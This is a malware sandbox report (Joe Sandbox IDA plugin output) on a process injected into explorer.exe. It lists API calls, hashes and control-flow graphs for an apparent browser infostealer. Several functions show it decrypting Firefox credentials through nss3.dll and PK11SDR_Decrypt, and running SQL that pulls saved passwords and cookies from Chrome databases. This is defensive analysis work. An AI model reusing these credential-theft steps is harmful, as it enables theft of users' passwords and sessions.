                                                                                                                                                                                • Opcode ID: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
                                                                                                                                                                                • Instruction ID: dfdbd7cbb9220e0444c77378ee5079393598eaa5abeb3f5e7b25c63c539c2f51
                                                                                                                                                                                • Opcode Fuzzy Hash: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
                                                                                                                                                                                • Instruction Fuzzy Hash: 8D41F23A71AF9091DB218F11F8943997364F3CABA4F544539CE5A17794EF39C946CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI ref: 0311729C
                                                                                                                                                                                  • Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                • GetAdaptersInfo.IPHLPAPI ref: 031172C7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                • String ID: o
                                                                                                                                                                                • API String ID: 2718687846-252678980
                                                                                                                                                                                • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                • Instruction ID: c2bc6c4f3bad3db11c867619fb95ba9d89b95b7491aab25456b4e511a9ca564c
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                                                                • Instruction Fuzzy Hash: D001B076608B4486DB31DB15E49439EB7A0F3CC798F480225EA8D47B68DB7CC695CF04
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectorySystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2188284642-0
                                                                                                                                                                                • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                • Instruction ID: 663c61c9385de3ee59666f9786ca8e99cd986c93f149e1ef290935518b5a1c19
                                                                                                                                                                                • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                                                                • Instruction Fuzzy Hash: 20311032119A85D7DB60DB24E48439AB764FB8C364F514336D6AE86AA8DF3CC1A4CB41
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL ref: 0311B3BE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID: @
                                                                                                                                                                                • API String ID: 2167126740-2766056989
                                                                                                                                                                                • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                • Instruction ID: 71312808f191cd8a2ce20bd5105696b45335d3ccac994376672d6b979472e997
                                                                                                                                                                                • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                                                                • Instruction Fuzzy Hash: C9E0A5B6638A8482D6519F65E45474BB764F7887B8F805315BAA906BD8CBBCC118CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL ref: 0E62244B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                                • Opcode ID: 546fafea68c79cb3a3cd112405f049519933be65302ff6dc45862b29a7b85276
                                                                                                                                                                                • Instruction ID: 30c9ea24826163849a5d7ccb9e7547fe9d01f94920388c99e77e2db83cd062fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 546fafea68c79cb3a3cd112405f049519933be65302ff6dc45862b29a7b85276
                                                                                                                                                                                • Instruction Fuzzy Hash: FFF0FCB9711760C1EB04CF19E46532977A5F7C5BE0F548A2ADF39073A0CF78C4448A40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3963845541-0
                                                                                                                                                                                • Opcode ID: b85905049aa1bb23a04c8eb200cd99015da4847a7cb7b02ce48d47da5766ffda
                                                                                                                                                                                • Instruction ID: 236d84b25afeabed9fd914d2da871935725093a459fa7a9475678dcd15eb3b14
                                                                                                                                                                                • Opcode Fuzzy Hash: b85905049aa1bb23a04c8eb200cd99015da4847a7cb7b02ce48d47da5766ffda
                                                                                                                                                                                • Instruction Fuzzy Hash: E2D05EB6A22B8082EA089B55E8513987B60F754B74FC58705CA35033D0CF38C259CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeMemoryVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3963845541-0
                                                                                                                                                                                • Opcode ID: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                • Instruction ID: 6731d97cd29f40b02a1c34d9d13d1a2a63b72b9149617660ac6a2957d3c5bf0e
                                                                                                                                                                                • Opcode Fuzzy Hash: db712fdc7e1c69cc4b3c08b17230264df9142ca57683cf2c056e2540a21d56f0
                                                                                                                                                                                • Instruction Fuzzy Hash: CCE0EC72508A8182D7219B60E40478AB760F3893B8F944315EAF812AE8CF7CC299CB04
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DelayExecution
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1249177460-0
                                                                                                                                                                                • Opcode ID: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                • Instruction ID: a10e8db5a004a616b7d97459fd1841353832ff841b97b0aca113ad2494e15068
                                                                                                                                                                                • Opcode Fuzzy Hash: 551b8892589dcd62e4628d181c76442dc689c90fb238e82810fb464567079569
                                                                                                                                                                                • Instruction Fuzzy Hash: 07D0C972A0868087CB299B28E44524EB7A4FB99344FD0462AEA8D457A8DA3CC665CF04
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 64fdd4e0956b1b095ab47ecebdf404defda4e8b3512b96d1864ac4d0eb1feca6
                                                                                                                                                                                • Instruction ID: f15ff32480e1f28cdd22c209b12dba5e9e540a36f0b4af56a7ed00720e5f80ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 64fdd4e0956b1b095ab47ecebdf404defda4e8b3512b96d1864ac4d0eb1feca6
                                                                                                                                                                                • Instruction Fuzzy Hash: D901752972099581EB14EFA1FC603A52396A7A0740F885C3D851D637F4FEB98D4ACB05

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 303 e623698-e6236ce call e62343c call e6b2238 308 e6236d4-e623766 call e6b2238 call e623cc0 call e6241d0 call e624340 call e623c14 call e623cc0 call e624340 303->308 309 e6237ae-e6237c7 call e6241d0 303->309 341 e62376b-e6237a9 call e6b1d98 call e623c14 * 4 308->341 342 e623768 308->342 314 e6237c9 309->314 315 e6237cc-e6237f4 LoadLibraryA call e623c14 309->315 314->315 322 e6238f0-e623910 call e623c14 315->322 323 e6237fa-e6238b7 GetProcAddress * 7 315->323 323->322 326 e6238b9-e6238c0 323->326 326->322 329 e6238c2-e6238c9 326->329 329->322 331 e6238cb-e6238d2 329->331 331->322 332 e6238d4-e6238db 331->332 332->322 334 e6238dd-e6238e4 332->334 334->322 336 e6238e6-e6238e9 334->336 336->322 338 e6238eb 336->338 338->322 341->309 342->341
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E62343C: SHGetValueA.SHLWAPI ref: 0E6234C7
                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 0E6237CF
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E623801
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E62381C
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E623837
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E623852
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E62386D
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E623888
                                                                                                                                                                                • GetProcAddress.KERNEL32 ref: 0E6238A3
                                                                                                                                                                                  • Part of subcall function 0E6241D0: std::_Xinvalid_argument.LIBCPMT ref: 0E624268
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$LibraryLoadValueXinvalid_argumentstd::_
                                                                                                                                                                                • String ID: NSS_Init$NSS_Shutdown$PATH$PATH=$PK11SDR_Decrypt$PK11_FreeSlot$PK11_GetInternalKeySlot$PL_ArenaFinish$PR_Cleanup$\nss3.dll
                                                                                                                                                                                • API String ID: 2776111621-1994164264
                                                                                                                                                                                • Opcode ID: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
                                                                                                                                                                                • Instruction ID: 915b71aea7dfcac12e9ea117db2cb344979d8381e7b2251960cce8b938b38309
                                                                                                                                                                                • Opcode Fuzzy Hash: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A614C75741FA195EB10DB60FCA439D33A1EB61798F80193AC90A677A4DF3A8949CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 674 e627a88-e627ac8 call e627708 CopyFileA 677 e627ae2-e627afc call e6a2b38 674->677 678 e627aca-e627ad3 GetLastError 674->678 680 e627adb-e627add 677->680 684 e627afe-e627b0c call e625e5c 677->684 679 e627ad5 GetLastError 678->679 678->680 679->680 682 e627be8-e627bff 680->682 684->680 687 e627b0e-e627b2a 684->687 688 e627b67 687->688 689 e627b2c-e627b2f 687->689 691 e627b69-e627ba0 call e677ee8 688->691 689->688 690 e627b31-e627b4f GetProcessHeap call e6c5168 689->690 690->688 696 e627b51-e627b54 690->696 697 e627ba2-e627bb0 GetProcessHeap HeapFree 691->697 698 e627bb6-e627be3 GetProcessHeap HeapFree call e6a0c7c DeleteFileA 691->698 700 e627b57-e627b63 696->700 697->698 698->682 700->700 702 e627b65 700->702 702->691
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
                                                                                                                                                                                  • Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD
                                                                                                                                                                                • CopyFileA.KERNEL32 ref: 0E627AC0
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0E627ACA
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0E627AD5
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E627B31
                                                                                                                                                                                • HeapAlloc.KERNEL32 ref: 0E627B43
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E627BA2
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E627BB0
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E627BB6
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E627BC4
                                                                                                                                                                                • DeleteFileA.KERNEL32 ref: 0E627BDD
                                                                                                                                                                                Strings
                                                                                                                                                                                • SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> '', xrefs: 0E627B82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                                                                                                                                • String ID: SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> ''
                                                                                                                                                                                • API String ID: 1126038018-4010397166
                                                                                                                                                                                • Opcode ID: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
                                                                                                                                                                                • Instruction ID: 5b350435fecd011e1d4183c592d176eef5f0f48ebee4839165c608f1e697099a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A419432214BD196DB109F22F8587A967A1FB45BD0F54842ADE8A53B14DF39E549CB00

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 645 e625944-e625984 call e627708 CopyFileA 648 e625986-e62598f GetLastError 645->648 649 e62599e-e6259b8 call e6a2b38 645->649 651 e625991 GetLastError 648->651 652 e625997-e625999 648->652 649->652 655 e6259ba-e6259c8 call e625e5c 649->655 651->652 653 e625aa4-e625abb 652->653 655->652 658 e6259ca-e6259e6 655->658 659 e625a23 658->659 660 e6259e8-e6259eb 658->660 661 e625a25-e625a5c call e677ee8 659->661 660->659 662 e6259ed-e625a0b GetProcessHeap call e6c5168 660->662 667 e625a72-e625a9f GetProcessHeap HeapFree call e6a0c7c DeleteFileA 661->667 668 e625a5e-e625a6c GetProcessHeap HeapFree 661->668 662->659 669 e625a0d-e625a10 662->669 667->653 668->667 671 e625a13-e625a1f 669->671 671->671 673 e625a21 671->673 673->661
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
                                                                                                                                                                                  • Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
                                                                                                                                                                                  • Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD
                                                                                                                                                                                • CopyFileA.KERNEL32 ref: 0E62597C
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0E625986
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0E625991
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E6259ED
                                                                                                                                                                                • HeapAlloc.KERNEL32 ref: 0E6259FF
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E625A5E
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E625A6C
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0E625A72
                                                                                                                                                                                • HeapFree.KERNEL32 ref: 0E625A80
                                                                                                                                                                                • DeleteFileA.KERNEL32 ref: 0E625A99
                                                                                                                                                                                Strings
                                                                                                                                                                                • select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h, xrefs: 0E625A3E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
                                                                                                                                                                                • String ID: select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h
                                                                                                                                                                                • API String ID: 1126038018-1255454737
                                                                                                                                                                                • Opcode ID: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
                                                                                                                                                                                • Instruction ID: 0acba4bb7c6354bc25332417aeb3b904c1c1c2195caabb7b32313d333c8d8fa9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 4241B436214BC196EB20DF22F8583A96761FB86BC0F58842ADE8F57B14DF39D449CB01

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 768 e6b9958-e6b9982 call e6b8e84 call e6b8eec 773 e6b9988-e6b9993 call e6b8e8c 768->773 774 e6b9b17-e6b9b85 call e6b1ffc call e6b2240 768->774 779 e6b9999-e6b99a4 call e6b8ebc 773->779 780 e6b9b02-e6b9b16 call e6b1ffc 773->780 790 e6b9b8e-e6b9b91 774->790 791 e6b9b87-e6b9b8c 774->791 788 e6b99aa-e6b99cd call e6b4ed0 GetTimeZoneInformation 779->788 789 e6b9aed-e6b9b01 call e6b1ffc 779->789 780->774 804 e6b99d3-e6b99f5 788->804 805 e6b9ac6-e6b9aec call e6b8e7c call e6b8e6c call e6b8e74 788->805 789->780 795 e6b9b98-e6b9b9d call e6b4f10 790->795 796 e6b9b93-e6b9b96 790->796 794 e6b9bdc-e6b9bee 791->794 800 e6b9bff call e6b9958 794->800 801 e6b9bf0-e6b9bf3 794->801 802 e6b9ba2-e6b9ba8 795->802 796->794 809 e6b9c04-e6b9c30 call e6b4ed0 call e6c2bd0 800->809 801->800 806 e6b9bf5-e6b9bfd call e6b9708 801->806 807 e6b9baa 802->807 808 e6b9bb3-e6b9bce call e6b2240 802->808 811 e6b99ff-e6b9a06 804->811 812 e6b99f7-e6b99fc 804->812 806->809 815 e6b9bac-e6b9bb1 call e6b4ed0 807->815 830 e6b9bd0-e6b9bd3 808->830 831 e6b9bd5-e6b9bd7 call e6b4ed0 808->831 819 e6b9a08-e6b9a10 811->819 820 e6b9a20-e6b9a23 811->820 812->811 815->796 819->820 826 e6b9a12-e6b9a1e 819->826 821 e6b9a26-e6b9a62 call e6bd96c WideCharToMultiByte 820->821 838 e6b9a72-e6b9a75 821->838 839 e6b9a64-e6b9a67 821->839 826->821 830->815 831->794 840 e6b9a78-e6b9aae WideCharToMultiByte 838->840 839->838 841 e6b9a69-e6b9a70 839->841 842 e6b9abf-e6b9ac3 840->842 843 e6b9ab0-e6b9ab3 840->843 841->840 842->805 843->842 844 e6b9ab5-e6b9abd 843->844 844->805
                                                                                                                                                                                APIs
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B997B
                                                                                                                                                                                  • Part of subcall function 0E6B8EEC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8F00
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B998C
                                                                                                                                                                                  • Part of subcall function 0E6B8E8C: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8EA0
                                                                                                                                                                                • _get_daylight.LIBCMT ref: 0E6B999D
                                                                                                                                                                                  • Part of subcall function 0E6B8EBC: _invalid_parameter_noinfo.LIBCMT ref: 0E6B8ED0
                                                                                                                                                                                  • Part of subcall function 0E6B4ED0: HeapFree.KERNEL32 ref: 0E6B4EE6
                                                                                                                                                                                  • Part of subcall function 0E6B4ED0: GetLastError.KERNEL32 ref: 0E6B4EF8
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 0E6B99C4
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 0E6B9A5A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 0E6B9AA6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                • String ID: ?$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                • API String ID: 500310315-688781733
                                                                                                                                                                                • Opcode ID: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                                                                                                                                • Instruction ID: 9b75b9bcb7847ee2eae5bbe39d755abf67d1c5c412b77116006a6b16d3210189
                                                                                                                                                                                • Opcode Fuzzy Hash: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
                                                                                                                                                                                • Instruction Fuzzy Hash: D251D732210790CAD760DF21F8907DA77A5F7897D8F94061AEB5E87B68DB38C881C750

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 845 311c860-311c88e 846 311c894-311c8dd InternetConnectW 845->846 847 311c9cd-311c9d3 845->847 848 311c8e4-311c92f HttpOpenRequestW 846->848 849 311c8df 846->849 850 311c9e0-311c9e6 847->850 851 311c9d5-311c9da InternetCloseHandle 847->851 852 311c931 848->852 853 311c936-311c953 HttpSendRequestW 848->853 849->847 854 311c9f3-311c9fb 850->854 855 311c9e8-311c9ed InternetCloseHandle 850->855 851->850 852->847 856 311c955-311c9a1 InternetQueryOptionW InternetSetOptionW 853->856 857 311c9a7-311c9c6 HttpSendRequestW 853->857 855->854 856->857 857->847
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_3110000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                • String ID: GET
                                                                                                                                                                                • API String ID: 830097650-1805413626
                                                                                                                                                                                • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                • Instruction ID: 415c915bb62bb4e3c6f737c79e92cd580264703eba84ece7972d6172cde3dd2e
                                                                                                                                                                                • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                • Instruction Fuzzy Hash: BE41D172118A8486E720CB54F45879BBBA4F7C8798F101126E7CA82A68CFBDC598CF40

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 867 e627c00-e627c43 SHGetFolderPathA 868 e627c45-e627c47 867->868 869 e627c4c-e627c71 lstrcatA lstrlenA 867->869 870 e627cf5-e627d12 868->870 871 e627c73-e627c7a 869->871 872 e627cf0 869->872 873 e627c7d-e627ce0 lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e627a88 871->873 872->870 875 e627ce5-e627cee 873->875 875->872 875->873
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                                                                                                                                • String ID: \User Data\Local State
                                                                                                                                                                                • API String ID: 2128322890-3114309041
                                                                                                                                                                                • Opcode ID: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                                                                                                                                • Instruction ID: 069df86d769a3ed219b183465883bb42dde95c672cb53c446c2c34cce2c64aa8
                                                                                                                                                                                • Opcode Fuzzy Hash: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
                                                                                                                                                                                • Instruction Fuzzy Hash: 62216F32324E8196DB10DB11FC58BA97361F794BC5F905426EA8F93B28DF39D509C740

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 858 e625abc-e625aff SHGetFolderPathA 859 e625b01-e625b03 858->859 860 e625b08-e625b2d lstrcatA lstrlenA 858->860 861 e625bb2-e625bcf 859->861 862 e625b2f-e625b36 860->862 863 e625bad 860->863 864 e625b39-e625b9d lstrcpyA * 2 lstrcatA lstrlenA lstrcpyA call e625944 862->864 863->861 866 e625ba2-e625bab 864->866 866->863 866->864
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_9_2_e620000_explorer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcpy$lstrcatlstrlen$FolderPath
                                                                                                                                                                                • String ID: \User Data\Local State
                                                                                                                                                                                • API String ID: 2128322890-3114309041
                                                                                                                                                                                • Opcode ID: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                                                                                                                                • Instruction ID: 39dab14aad3627e2d7023f9a0e40b9e2b4d2b6ec49a813b8c5616e2355b3b722
                                                                                                                                                                                • Opcode Fuzzy Hash: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
                                                                                                                                                                                • Instruction Fuzzy Hash: 08314F32324E9196DB10DF11FC98BA97361F794B85F905426EA8F97B28DF39C90AC740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
